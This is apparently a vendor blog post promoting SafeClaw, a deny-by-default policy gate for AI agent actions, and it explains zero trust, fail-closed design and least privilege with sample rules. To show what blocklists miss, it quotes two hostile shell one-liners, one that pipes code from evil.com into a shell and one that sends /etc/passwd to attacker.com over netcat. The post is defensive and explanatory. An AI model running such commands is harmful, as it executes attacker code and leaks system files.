2025-11-24 · Authensor

Deny-by-Default Architecture Explained: Zero Trust for AI Agents

In January 2025, Clawdbot leaked 1.5 million API keys in under a month. The root cause was not a bug in the AI model. It was not a prompt injection attack. It was a failure of architecture: the agent had access to capabilities it should not have had, and nothing prevented it from using them.

The fix is not better prompts. It is not model fine-tuning. It is not "teaching" the agent to be careful. The fix is deny-by-default architecture: nothing executes unless explicitly permitted by a security policy evaluated outside the agent's control.

This is zero trust applied to AI agents. And it is the foundational design principle of SafeClaw.

What Deny-by-Default Means

Deny-by-default is a security posture where every action is blocked unless a rule explicitly allows it. There is no implicit permission. There is no "the agent probably should be able to do this." There is no ambient authority.

In concrete terms:

The alternative -- allow-by-default -- is the architecture that most AI agent frameworks use today. The agent has access to every tool it is given, and the only restrictions are what the developer remembers to block. This is the wrong default.

Allow-by-Default: The Failure Mode

Allow-by-default means everything is permitted unless explicitly blocked. The developer must anticipate every dangerous action and write a rule to prevent it. This is a losing strategy for three reasons:

1. The action space is unbounded. An AI agent with shell access can execute any command. You cannot enumerate every dangerous command. You will block rm -rf / but forget about curl https://evil.com/exfil | sh. You will block direct data exfiltration but miss base64 /etc/passwd | nc attacker.com 4444. The attacker (or the misbehaving agent) only needs to find one action you forgot to block.

2. Capabilities grow over time. Today your agent has three tools. Next month it has seven. Each new tool adds capabilities you must evaluate and potentially block. Under allow-by-default, each new tool is immediately permitted for all uses. Under deny-by-default, each new tool is immediately blocked until you explicitly grant access.

3. Failure favors the attacker. Under allow-by-default, when your rules fail (misconfiguration, edge case, unexpected input), the action is allowed. Under deny-by-default, when your rules fail, the action is denied. The failure mode of deny-by-default is safe; the failure mode of allow-by-default is catastrophic.

The Firewall Analogy

Network firewalls settled this debate decades ago. Modern firewall best practice is deny-by-default (also called "default deny" or "implicit deny"):

# Firewall ruleset
allow tcp from any to web-server port 80
allow tcp from any to web-server port 443
allow tcp from admin-net to any port 22

[implicit deny all]

Only explicitly listed traffic is allowed. Everything else is silently dropped. This is not controversial in network security. It is the baseline.

SafeClaw applies the same model to AI agent actions:

# SafeClaw policy
allow file_write to /workspace/**
allow shell_exec matching "git *"
allow network to https://api.github.com/*

[implicit deny all]

Only explicitly listed actions are allowed. Everything else is denied. The agent can write files in the workspace, run git commands, and call the GitHub API. Nothing more.

Zero Trust: Trust Nothing, Verify Everything

The zero trust security model, originally applied to network architecture, is built on a principle: never grant access based on assumed trust. Every request must be authenticated, authorized, and evaluated, regardless of its origin.

Applied to AI agents, zero trust means:

SafeClaw implements this by sitting between the agent and the system, evaluating every action against an external policy before execution. The agent has no access to the policy engine, no ability to modify rules, and no way to bypass the evaluation.

Control Plane Unreachable: No Fail-Open

A critical design decision in deny-by-default architecture is what happens when the control plane is unreachable. SafeClaw maintains a connection to the Authensor control plane for policy updates, key management, and audit trail synchronization. What happens when that connection drops?

Some systems "fail open" -- when the policy authority is unreachable, they allow all actions. The reasoning is that availability is more important than security. This is wrong for AI agent security.

SafeClaw fails closed. If the control plane is unreachable and the local policy state cannot be verified, all actions are denied. The agent stops. This is the correct behavior because:

  1. An unreachable control plane may indicate an attack. An attacker who wants to bypass SafeClaw could disrupt the control plane connection. Failing open under these conditions is exactly what the attacker wants.
  2. A stopped agent causes no damage. An agent that is blocked from acting cannot exfiltrate data, delete files, or execute malicious commands. Downtime is recoverable. Data breaches are not.
  3. The failure is visible. When the agent is blocked, operators are alerted. They can investigate the control plane connectivity issue and restore service. A fail-open failure is silent and may go unnoticed.
This is the same principle behind fail-closed fire doors: when the system fails, it defaults to the safe state.

Implementing Deny-by-Default in Practice

Deny-by-default requires more upfront work than allow-by-default. You must explicitly define what the agent is allowed to do. Here is a practical approach:

Step 1: Enumerate Required Capabilities

Before deploying SafeClaw, determine what your agent needs to do. A coding agent might need:


Step 2: Write Minimal Rules

Create rules that allow only the required capabilities with the tightest constraints possible:

Rule 1: allow file_write to /project/**
Rule 2: allow shell_exec matching "git *"
Rule 3: allow shell_exec matching "npm test"
Rule 4: allow shell_exec matching "npm install *"
Rule 5: allow network to https://registry.npmjs.org/*
Rule 6: allow network to https://api.github.com/*
[implicit deny all]

Step 3: Use Simulation Mode

SafeClaw's simulation mode evaluates policies without enforcing them. Run the agent with simulation mode enabled to see which actions would be denied. This reveals capabilities you forgot to include without blocking the agent during development.

npx @authensor/safeclaw

The browser dashboard at safeclaw.onrender.com shows simulated evaluations, highlighting denials that might indicate missing rules.

Step 4: Refine and Enforce

Review the simulation results. Add rules for legitimate actions that were denied. Confirm that denied actions you did not expect are genuinely unnecessary. Then switch from simulation mode to enforcement mode.

Step 5: Monitor and Adapt

As the agent's requirements change, update the policy through the dashboard. New capabilities require new rules. Removed capabilities should have their rules deleted. The deny-by-default posture ensures that capability changes are explicit and deliberate.

The Principle of Least Privilege

Deny-by-default is an implementation of the principle of least privilege: every entity should have only the minimum permissions necessary to perform its function. For AI agents, this means:

The principle of least privilege is well-established in security engineering. What is new is its application to AI agents, which have traditionally been given broad, unconstrained access to tools.

Common Objections

"Deny-by-default is too restrictive."
It is exactly as restrictive as you configure it to be. The default is deny, but you can allow any action through explicit rules. The restrictiveness is a feature during initial deployment (nothing unexpected happens) and converges to exactly the right level of access as you add rules.

"The agent will stop working when it hits a denied action."
Well-designed agents handle denials gracefully. SafeClaw returns structured denial responses that the agent can process. The agent can attempt alternative approaches, request different permissions, or report the denial. If your agent crashes on a denied action, that is a bug in the agent, not a problem with the security posture.

"I trust my agent."
You should not. The Clawdbot incident leaked 1.5 million API keys not because the agent was malicious, but because it had access to capabilities that were unnecessary for its task. Trust is not a security control. Verified, enforced policy is.

"This adds complexity."
It adds the right complexity. Writing security policy is work. But it is work that makes your system's capabilities explicit, documented, and auditable. Without it, the capabilities are implicit, undocumented, and unknowable until something goes wrong.

SafeClaw's Implementation

SafeClaw implements deny-by-default across every layer:

The architecture is tested with 446 tests under TypeScript strict mode. Every edge case in deny-by-default behavior -- missing rules, unreachable control plane, unknown action types, malformed policy -- is covered.

SafeClaw works with Claude, OpenAI, and LangChain agents. It is built on the Authensor framework with zero runtime dependencies. The client is 100% open source. Get started with npx @authensor/safeclaw and configure your first deny-by-default policy in minutes.

For more on the Authensor framework, visit authensor.com.

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw